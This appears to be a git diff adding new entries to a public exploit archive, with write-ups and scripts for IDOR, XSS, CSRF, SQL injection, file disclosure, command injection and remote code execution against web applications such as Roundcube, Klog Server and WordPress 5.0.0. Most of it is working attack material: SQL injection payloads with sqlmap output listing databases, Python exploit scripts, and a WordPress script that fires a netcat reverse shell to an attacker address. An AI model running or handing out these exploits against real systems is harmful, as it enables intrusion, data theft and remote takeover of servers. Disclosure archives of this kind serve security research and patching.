diff --git a/exploits/aspx/webapps/49508.txt b/exploits/aspx/webapps/49508.txt new file mode 100644 index 000000000..ceff22c65 --- /dev/null +++ b/exploits/aspx/webapps/49508.txt @@ -0,0 +1,14 @@ +# Exploit Title: H8 SSRMS - 'id' IDOR +# Date: 01/31/2021 +# Exploit Author: Mohammed Farhan +# Vendor Homepage: https://www.height8tech.com/ +# Version: H8 SSRMS +# Tested on: Windows 10 + + +Vulnerability Details +====================== +Login to the application +Navigate to Payment Section and Click on Print button. +In QuotePrint.aspx, modify the id Parameter to View User details, Address, +Payments, Phonenumber and Email of other Users \ No newline at end of file diff --git a/exploits/php/webapps/49500.txt b/exploits/php/webapps/49500.txt new file mode 100644 index 000000000..e64cfc594 --- /dev/null +++ b/exploits/php/webapps/49500.txt @@ -0,0 +1,17 @@ +# Exploit Title: MyBB Delete Account Plugin 1.4 - Cross-Site Scripting +# Date: 1/25/2021 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Delete_Account/ +# Version: 1.4 +# Tested on: Windows 10 + +1. Description: +This plugin allows users to delete their account. Giving a reason for deleting your account is vulnerable to XSS. + +2. Proof of Concept: + +- Go to User CP -> Delete Account +- Input a payload for delete account reason +Payload will execute here.. admin/index.php?module=user-deleteaccount \ No newline at end of file diff --git a/exploits/php/webapps/49501.txt b/exploits/php/webapps/49501.txt new file mode 100644 index 000000000..330025a64 --- /dev/null +++ b/exploits/php/webapps/49501.txt @@ -0,0 +1,79 @@ +# Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection +# Google Dork: N/A +# Date: 29/1/2021 +# Exploit Author: Zeyad Azima +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/ +# Version: V1 +# Tested on: Windows + +# Identify the vulnerability + +1- go to http://localhost/animals.php and click on an animal + +2- then add the following payload to the url + +payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh +url: http://localhost/animal-detail.php?anid=1%20anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh + +If the web server makes you wait 5 seconds then it's vulnerable + + +# Exploit + +Now you can exploit it using sqlmap + +command: sqlmap -u url --dbs + +example: sqlmap -u http://localhost/zms/animal-detail.php?anid=1 --dbs + ___ + __H__ + ___ ___[.]_____ ___ ___ {1.4.10.16#dev} +|_ -| . [.] | .'| . | +|___|_ [)]_|_|_|__,| _| + |_|V... |_| http://sqlmap.org + +[!] legal disclaimer: Usage of sqlmap for attacking targets without +prior mutual consent is illegal. It is the end user's responsibility +to obey all applicable local, state and federal laws. Developers +assume no liability and are not responsible for any misuse or damage +caused by this program + +[*] starting @ 23:05:33 /2021-01-29/ + +[23:05:34] [INFO] resuming back-end DBMS 'mysql' +[23:05:34] [INFO] testing connection to the target URL +you have not declared cookie(s), while server wants to set its own +('PHPSESSID=ban6c541hos...n856fi447q'). Do you want to use those [Y/n] +y +sqlmap resumed the following injection point(s) from stored session: +--- +Parameter: anid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: anid=9' AND 1925=1925 AND 'JrZo'='JrZo + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND +'jMXh'='jMXh + + Type: UNION query + Title: Generic UNION query (NULL) - 8 columns + Payload: anid=9' UNION ALL SELECT +NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL-- +- +--- +[23:05:36] [INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.41, PHP 7.3.10, PHP +back-end DBMS: MySQL >= 5.0.12 +[23:05:36] [INFO] fetching database names +available databases [6]: +[*] information_schema +[*] mysql +[*] performance_schema +[*] sys +[*] umspsdb +[*] zmsdb + +[23:05:36] [INFO] fetched data logged to text files under \ No newline at end of file diff --git a/exploits/php/webapps/49502.txt b/exploits/php/webapps/49502.txt new file mode 100644 index 000000000..fd59d5b6a --- /dev/null +++ b/exploits/php/webapps/49502.txt @@ -0,0 +1,82 @@ +# Exploit Title: User Management System 1.0 - 'uid' SQL Injection +# Google Dork: N/A +# Date: 29/1/2021 +# Exploit Author: Zeyad Azima +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/user-management-system-in-php-using-stored-procedure/ +# Version: V1 +# Tested on: Windows + +# Identify the vulnerability + +1- go to http://localhost/admin/ and login with your account + +2- then go to http://localhost/admin/registered-users.php + +3- Click edit on any user and then add the following payload to the url + +payload: AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT) +url: http://localhost/ums-sp/admin/edit-user-profile.php?uid=3%20AND%20(SELECT%205008%20FROM%20(SELECT(SLEEP(5)))zVHT) + +If the web server makes you wait 5 seconds then it's vulnerable + + +# Exploit + +Now you can exploit it using sqlmap + +command: sqlmap -u url --cookies="cookies here" --dbs + +example: sqlmap -u http://localhost/admin/edit-user-profile.php?uid=3 +--cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs + + ___ + __H__ + ___ ___[,]_____ ___ ___ {1.4.10.16#dev} +|_ -| . [)] | .'| . | +|___|_ [']_|_|_|__,| _| + |_|V... |_| http://sqlmap.org + +[!] legal disclaimer: Usage of sqlmap for attacking targets without +prior mutual consent is illegal. It is the end user's responsibility +to obey all applicable local, state and federal laws. Developers +assume no liability and are not responsible for any misuse or damage +caused by this program + +[*] starting @ 22:55:16 /2021-01-29/ + +[22:55:16] [INFO] resuming back-end DBMS 'mysql' +[22:55:16] [INFO] testing connection to the target URL +sqlmap resumed the following injection point(s) from stored session: +--- +Parameter: uid (GET) + Type: boolean-based blind + Title: Boolean-based blind - Parameter replace (original value) + Payload: uid=(SELECT (CASE WHEN (7929=7929) THEN 3 ELSE (SELECT +1849 UNION SELECT 3460) END)) + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: uid=3 AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT) +--- +[22:55:16] [INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.41, PHP 7.3.10 +back-end DBMS: MySQL >= 5.0.12 +[22:55:16] [INFO] fetching database names +[22:55:16] [INFO] fetching number of databases +[22:55:16] [INFO] resumed: 6 +[22:55:16] [INFO] resumed: mysql +[22:55:16] [INFO] resumed: information_schema +[22:55:16] [INFO] resumed: performance_schema +[22:55:16] [INFO] resumed: sys +[22:55:16] [INFO] resumed: umspsdb +[22:55:16] [INFO] resumed: zmsdb +available databases [6]: +[*] information_schema +[*] mysql +[*] performance_schema +[*] sys +[*] umspsdb +[*] zmsdb + +[22:55:16] [INFO] fetched data logged to text files under \ No newline at end of file diff --git a/exploits/php/webapps/49503.txt b/exploits/php/webapps/49503.txt new file mode 100644 index 000000000..d1885175e --- /dev/null +++ b/exploits/php/webapps/49503.txt @@ -0,0 +1,82 @@ +# Exploit Title: Park Ticketing Management System 1.0 - 'viewid' SQL Injection +# Google Dork: N/A +# Date: 29/1/2021 +# Exploit Author: Zeyad Azima +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/ +# Version: V1 +# Tested on: Windows + +# Identify the vulnerability + +1- go to http://localhost/index.php and login with your account + +2- then go to http://localhost/manage-normal-ticket.php + +3- Click view on any ticket. then add the following payload to the url + +payload: ' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB) AND 'QCDH'='QCDH +url: http://localhost/view-normal-ticket.php?viewid=1%27%20AND%20(SELECT%208292%20FROM%20(SELECT(SLEEP(5)))XIQB)%20AND%20%27QCDH%27=%27QCDH + +If the web server makes you wait 5 seconds then it's vulnerable + + +# Exploit + +Now you can exploit it using sqlmap + +command: sqlmap -u url --cookies="cookies here" --dbs + +example: sqlmap -u http://localhost/view-normal-ticket.php?viewid=1 +--cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs + + ___ + __H__ + ___ ___[)]_____ ___ ___ {1.4.10.16#dev} +|_ -| . [)] | .'| . | +|___|_ [.]_|_|_|__,| _| + |_|V... |_| http://sqlmap.org + +[!] legal disclaimer: Usage of sqlmap for attacking targets without +prior mutual consent is illegal. It is the end user's responsibility +to obey all applicable local, state and federal laws. Developers +assume no liability and are not responsible for any misuse or damage +caused by this program + +[*] starting @ 23:19:33 /2021-01-29/ + +[23:19:34] [INFO] resuming back-end DBMS 'mysql' +[23:19:34] [INFO] testing connection to the target URL +sqlmap resumed the following injection point(s) from stored session: +--- +Parameter: viewid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: viewid=1' AND 5743=5743 AND 'wcUF'='wcUF + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: viewid=1' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB) +AND 'QCDH'='QCDH + + Type: UNION query + Title: Generic UNION query (NULL) - 7 columns + Payload: viewid=1' UNION ALL SELECT +NULL,NULL,NULL,CONCAT(0x716a767a71,0x6f5367494d7573444b726d466e617a77735574536d49466a654d6569746b4972745556686a4e4548,0x716a767671),NULL,NULL,NULL-- +- +--- +[23:19:34] [INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.41, PHP 7.3.10 +back-end DBMS: MySQL >= 5.0.12 +[23:19:34] [INFO] fetching database names +available databases [8]: +[*] detsdb +[*] information_schema +[*] mysql +[*] performance_schema +[*] ptmsdb +[*] sys +[*] umspsdb +[*] zmsdb + +[23:19:34] [INFO] fetched data logged to text files under \ No newline at end of file diff --git a/exploits/php/webapps/49504.txt b/exploits/php/webapps/49504.txt new file mode 100644 index 000000000..07202e363 --- /dev/null +++ b/exploits/php/webapps/49504.txt @@ -0,0 +1,15 @@ +# Exploit Title: MyBB Trending Widget Plugin 1.2 - Cross-Site Scripting +# Date: 11/28/2018 +# Author: 0xB9 +# Software Link: https://github.com/zainali99/trends-widget +# Version: 1.2 +# Tested on: Windows 10 + +1. Description: +This plugin shows the most trending threads. Trending thread titles aren't sanitized to user input. + +2. Proof of Concept: + +- Have a trending thread in the widget +- Change the thread title to a payload +Anyone that visits the forum will execute payload \ No newline at end of file diff --git a/exploits/php/webapps/49505.txt b/exploits/php/webapps/49505.txt new file mode 100644 index 000000000..ad1b56d39 --- /dev/null +++ b/exploits/php/webapps/49505.txt @@ -0,0 +1,16 @@ +# Exploit Title: MyBB Thread Redirect Plugin 0.2.1 - Cross-Site Scripting +# Date: 7/23/2018 +# Author: 0xB9 +# Software Link: https://github.com/jamiesage123/Thread-Redirect +# Version: 0.2.1 +# Tested on: Windows 10 + +1. Description: +This plugin allows threads to redirect to a URL with optional custom text. The custom text input is vulnerable to Cross-Site Scripting. + +2. Proof of Concept: + +- Create a new thread +- Input any Thread Subject and Redirect URL you'd like +- Use the following payload for Your Message +Anyone who views the thread will execute payload. \ No newline at end of file diff --git a/exploits/php/webapps/49507.html b/exploits/php/webapps/49507.html new file mode 100644 index 000000000..025de70ca --- /dev/null +++ b/exploits/php/webapps/49507.html @@ -0,0 +1,48 @@ +# Title: bloofoxCMS 0.5.2.1 - CSRF (Add user) +# Exploit Author: LiPeiYi +# Date: 2020-12-18 +# Vendor Homepage: https://www.bloofox.com/ +# Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1 +# Version: 0.5.1.0 -.5.2.1 +# Tested on: windows 10 + +#Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site + +###PoC + + + + + + +exp detail:https://github.com/alexlang24/bloofoxCMS/issues/4 \ No newline at end of file diff --git a/exploits/php/webapps/49509.txt b/exploits/php/webapps/49509.txt new file mode 100644 index 000000000..72931224a --- /dev/null +++ b/exploits/php/webapps/49509.txt @@ -0,0 +1,17 @@ +# Exploit Title: Vehicle Parking Tracker System 1.0 - 'Owner Name' Stored Cross-Site Scripting +# Date: 2021-01-30 +# Exploit Author: Anmol K Sachan +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/ +# Software: : Vehicle Parking Tracker System +# Version : 1.0 +# Vulnerability Type: Cross-site Scripting +# Tested on Windows 10 XAMPP +# This application is vulnerable to Stored XSS vulnerability. +# Vulnerable script: + +1) http://localhost/vpms/add-vehicle.php +# Vulnerable parameters: 'Owner Name' +# Payload used: ()"> +# POC: manage-incomingvehicle.php +# You will see your Javascript code executed. \ No newline at end of file diff --git a/exploits/php/webapps/49510.py b/exploits/php/webapps/49510.py new file mode 100755 index 000000000..e4a48585e --- /dev/null +++ b/exploits/php/webapps/49510.py @@ -0,0 +1,60 @@ +# Exploit Title: Roundcube Webmail 1.2 - File Disclosure +# Date: 09-11-2017 +# Exploit Author: stonepresto +# Vendor Homepage: https://roundcube.net/ +# Software Link: https://sourceforge.net/projects/roundcubemail/files/roundcubemail-beta/1.2-beta/ +# Version: 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2 +# Tested on: roundcube version 1.2-beta +# CVE : CVE-2017-16651 + +#!/usr/bin/env python3 +# Reference: https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1 +# https://github.com/stonepresto/CVE-2017-16651 +# Exploit Author: stonepresto + +import requests +import re +import sys + +URL="https://127.0.0.1/" +USER="user@example.com" +PASS="password" + +def main(): + s = requests.Session() + r = s.get(URL,params={"_task":"login"},verify=False) + token = None + for line in r.text.split("\n"): + if 'name="_token"' in line: + token = line.split("value=")[1].split('"')[1] + print("[+] token: %s" % token) + if token is None: + print("[!] unable to retrieve token") + sys.exit(1) + + data = { + "_token":token, + "_task":"login", + "_action":"login", + "_timezone[files][1][path]":sys.argv[1], + "_url":"_task%3Dlogin", + "_user":USER, + "_pass":PASS + } + r = s.post(URL,params={"_task":"login"},data=data,verify=False) + + params = { + "_task":"settings", + "_action":"upload-display", + "_from":"timezone", + "_file":"rcmfile1" + } + + r = s.get(URL,params=params,verify=False) + print(r.text) + +if __name__ == "__main__": + if len(sys.argv) != 2: + print("[!] Usage: %s " % sys.argv[0]) + else: + main() \ No newline at end of file diff --git a/exploits/php/webapps/49511.py b/exploits/php/webapps/49511.py new file mode 100755 index 000000000..6ec501986 --- /dev/null +++ b/exploits/php/webapps/49511.py @@ -0,0 +1,86 @@ +# Exploit Title: Klog Server 2.4.1 - Command Injection (Authenticated) +# Date: 26.01.2021 +# Exploit Author: Metin Yunus Kandemir +# Vendor Homepage: https://www.klogserver.com/ +# Version: 2.4.1 +# Description: https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection +# CVE: 2021-3317 + +""" +Description: +"source" parameter is executed via shell_exec() function without input validation in async.php file. + +Example: +python3 PoC.py --target 10.10.56.51 --username admin --password admin --command id +[*] Status Code for login request: 302 +[+] Authentication was successful! +[*] Exploiting... + +uid=48(apache) gid=48(apache) groups=48(apache) + +""" + +import argparse +import requests +import sys +import urllib3 +from argparse import ArgumentParser, Namespace + + +def main(): + dsc = "Klog Server 2.4.1 - Command Injection (Authenticated)" + parser: ArgumentParser = argparse.ArgumentParser(description=dsc) + parser.add_argument("--target", help="IPv4 address of Cockpit server", type=str, required=True) + parser.add_argument("--username", help="Username", type=str, required=True) + parser.add_argument("--password", help="Password", type=str, required=True) + parser.add_argument("--command", help="Command", type=str, required=True) + args: Namespace = parser.parse_args() + if args.target: + target = args.target + if args.username: + username = args.username + if args.password: + password = args.password + if args.command: + command = args.command + + exploit(target, username, password, command) + + +def exploit(target, username, password, command): + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + s = requests.Session() + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded", + "Connection": "close", + "Upgrade-Insecure-Requests": "1", + } + + data = {"user" : username, "pswd" : password} + + login = s.post("https://" + target + "/actions/authenticate.php" , data=data, headers=headers, allow_redirects=False, verify=False) + print("[*] Status Code for login request: " + str(login.status_code)) + + if login.status_code == 302: + check = s.get("https://" + target + "/index.php", allow_redirects=False, verify=False) + if check.status_code == 200: + print("[+] Authentication was successful!") + else: + print("[-] Authentication was unsuccessful!") + sys.exit(1) + else: + print("Something went wrong!") + sys.exit(1) + + print("[*] Exploiting...\n") + + executeCommand = s.get("https://" + target + "/actions/async.php?action=stream&source=;"+ command +";", allow_redirects=False, verify=False) + print(executeCommand.text) + sys.exit(0) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/49512.py b/exploits/php/webapps/49512.py new file mode 100755 index 000000000..88aee6d58 --- /dev/null +++ b/exploits/php/webapps/49512.py @@ -0,0 +1,186 @@ +# Exploit Title: WordPress 5.0.0 - Image Remote Code Execution +# Date: 2020-02-01 +# Exploit Authors: OUSSAMA RAHALI ( aka V0lck3r) +# Discovery Author : RIPSTECH Technology +# Version: WordPress 5.0.0 and <= 4.9.8 . +# References : CVE-2019-89242 | CVE-2019-89242 | https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ + +#/usr/bin/env python3 + +import requests +import re +import sys +from datetime import datetime + +banner = """ + +__ __ _ ____ ____ _____ +\ \ / /__ _ __ __| |_ __ _ __ ___ ___ ___ | _ \ / ___| ____| + \ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __| | |_) | | | _| + \ V V / (_) | | | (_| | |_) | | | __/\__ \__ \ | _ <| |___| |___ + \_/\_/ \___/|_| \__,_| .__/|_| \___||___/___/ |_| \_\\____|_____| + |_| + 5.0.0 and <= 4.9.8 +""" +print(banner) +print("usage :") +print("=======") +usage = 'python3 RCE_wordpress.py http://:/ ' +print(usage) + +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +wp_theme = sys.argv[4] # wpscan results + +lhost = '10.10.10.10' #attacker ip +lport = '4141' #listening port + +date = str(datetime.now().strftime('%Y'))+'/'+str(datetime.now().strftime('%m'))+'/' + +imagename = 'gd.jpg' +# ====== +# Note : +# ====== +# It could be any jpg image, BUT there are some modifications first : +# 1- image name as : "gd.jpg" +# 2- place the image in the same directory as this exploit. +# 3- inject the php payload via exiftool : exiftool gd.jpg -CopyrightNotice="" + +data = { + 'log':username, + 'pwd':password, + 'wp-submit':'Log In', + 'redirect_to':url+'wp-admin/', + 'testcookie':1 +} + +r = requests.post(url+'wp-login.php',data=data) + +if r.status_code == 200: + print("[+] Login successful.\n") +else: + print("[-] Failed to login.") + exit(0) + +cookies = r.cookies + +print("[+] Getting Wp Nonce ... ") + +res = requests.get(url+'wp-admin/media-new.php',cookies=cookies) +wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text) + +if len(wp_nonce_list) == 0 : + print("[-] Failed to retrieve the _wpnonce \n") + exit(0) +else : + wp_nonce = wp_nonce_list[0] + print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce+"\n") + +print("[+] Uploading the image ... ") + +data = { + 'name': 'gd.jpg', + 'action': 'upload-attachment', + '_wpnonce': wp_nonce +} + +image = {'async-upload': (imagename, open(imagename, 'rb'))} +r_upload = requests.post(url+'wp-admin/async-upload.php', data=data, files=image, cookies=cookies) +if r_upload.status_code == 200: + image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0] + _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0] + print('[+] Image uploaded successfully ! Image ID :'+ image_id+"\n") +else : + print("[-] Failed to receive a response for uploaded image ! try again . \n") + exit(0) + +print("[+] Changing the path ... ") + + +data = { + '_wpnonce':_wp_nonce, + 'action':'editpost', + 'post_ID':image_id, + 'meta_input[_wp_attached_file]':date+imagename+'?/../../../../themes/'+wp_theme+'/rahali' +} + +res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies) +if res.status_code == 200: + print("[+] Path has been changed successfully. \n") +else : + print("[-] Failed to change the path ! Make sure the theme is correcte .\n") + exit(0) + +print("[+] Getting Ajax nonce ... ") + +data = { + 'action':'query-attachments', + 'post_id':0, + 'query[item]':43, + 'query[orderby]':'date', + 'query[order]':'DESC', + 'query[posts_per_page]':40, + 'query[paged]':1 +} + +res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies) +ajax_nonce_list=re.findall(r',"edit":"(\w+)"',res.text) + +if res.status_code == 200 and len(ajax_nonce_list) != 0 : + ajax_nonce = ajax_nonce_list[0] + print('[+] Ajax Nonce retrieved successfully ! ajax_nonce : '+ ajax_nonce+'\n') +else : + print("[-] Failed to retrieve ajax_nonce.\n") + exit(0) + + +print("[+] Cropping the uploaded image ... ") + +data = { + 'action':'crop-image', + '_ajax_nonce':ajax_nonce, + 'id':image_id, + 'cropDetails[x1]':0, + 'cropDetails[y1]':0, + 'cropDetails[width]':200, + 'cropDetails[height]':100, + 'cropDetails[dst_width]':200, + 'cropDetails[dst_height]':100 +} + +res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies) +if res.status_code == 200: + print("[+] Done . \n") +else : + print("[-] Erorr ! Try again \n") + exit(0) + +print("[+] Creating a new post to include the image... ") + +res = requests.post(url+'wp-admin/post-new.php', cookies=cookies) +if res.status_code == 200: + _wpnonce = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)[0] + post_id = re.findall(r'"post":{"id":(\w+),',res.text)[0] + print("[+] Post created successfully . \n") +else : + print("[-] Erorr ! Try again \n") + exit(0) + +data={ + '_wpnonce':_wpnonce, + 'action':'editpost', + 'post_ID':post_id, + 'post_title':'RCE poc by v0lck3r', + 'post_name':'RCE poc by v0lck3r', + 'meta_input[_wp_page_template]':'cropped-rahali.jpg' +} +res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies) +if res.status_code == 200: + print("[+] POC is ready at : "+url+'?p='+post_id+'&0=id\n') + print("[+] Executing payload !") + requests.get(f"{url}?p={post_id}&0=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20{lhost}%20{lport}%20%3E%2Ftmp%2Ff",cookies=cookies) + +else : + print("[-] Erorr ! Try again (maybe change the payload) \n") + exit(0) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 87a5e67a0..7d67ae04c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43406,6 +43406,7 @@ id,file,description,date,author,type,platform,port 49113,exploits/multiple/webapps/49113.py,"Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF",2020-11-27,"Julien Ahrens",webapps,multiple, 49114,exploits/php/webapps/49114.txt,"Moodle 3.8 - Unrestricted File Upload",2020-11-27,"Sirwan Veisi",webapps,php, 49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php, +49500,exploits/php/webapps/49500.txt,"MyBB Delete Account Plugin 1.4 - Cross-Site Scripting",2021-02-01,0xB9,webapps,php, 49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php, 49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php, 49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php, @@ -43692,3 +43693,14 @@ id,file,description,date,author,type,platform,port 49497,exploits/php/webapps/49497.txt,"Simple Public Chat Room 1.0 - Authentication Bypass SQLi",2021-01-29,"Richard Jones",webapps,php, 49498,exploits/php/webapps/49498.txt,"Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting",2021-01-29,"Richard Jones",webapps,php, 49499,exploits/hardware/webapps/49499.py,"SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)",2021-01-29,"Darren Martyn",webapps,hardware, +49501,exploits/php/webapps/49501.txt,"Zoo Management System 1.0 - 'anid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php, +49502,exploits/php/webapps/49502.txt,"User Management System 1.0 - 'uid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php, +49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php, +49504,exploits/php/webapps/49504.txt,"MyBB Trending Widget Plugin 1.2 - Cross-Site Scripting",2021-02-01,0xB9,webapps,php, +49505,exploits/php/webapps/49505.txt,"MyBB Thread Redirect Plugin 0.2.1 - Cross-Site Scripting",2021-02-01,0xB9,webapps,php, +49507,exploits/php/webapps/49507.html,"bloofoxCMS 0.5.2.1 - CSRF (Add user)",2021-02-01,LiPeiYi,webapps,php, +49508,exploits/aspx/webapps/49508.txt,"H8 SSRMS - 'id' IDOR",2021-02-01,"Mohammed Farhan",webapps,aspx, +49509,exploits/php/webapps/49509.txt,"Vehicle Parking Tracker System 1.0 - 'Owner Name' Stored Cross-Site Scripting",2021-02-01,"Anmol K Sachan",webapps,php, +49510,exploits/php/webapps/49510.py,"Roundcube Webmail 1.2 - File Disclosure",2021-02-01,stonepresto,webapps,php, +49511,exploits/php/webapps/49511.py,"Klog Server 2.4.1 - Command Injection (Authenticated)",2021-02-01,"Metin Yunus Kandemir",webapps,php, +49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,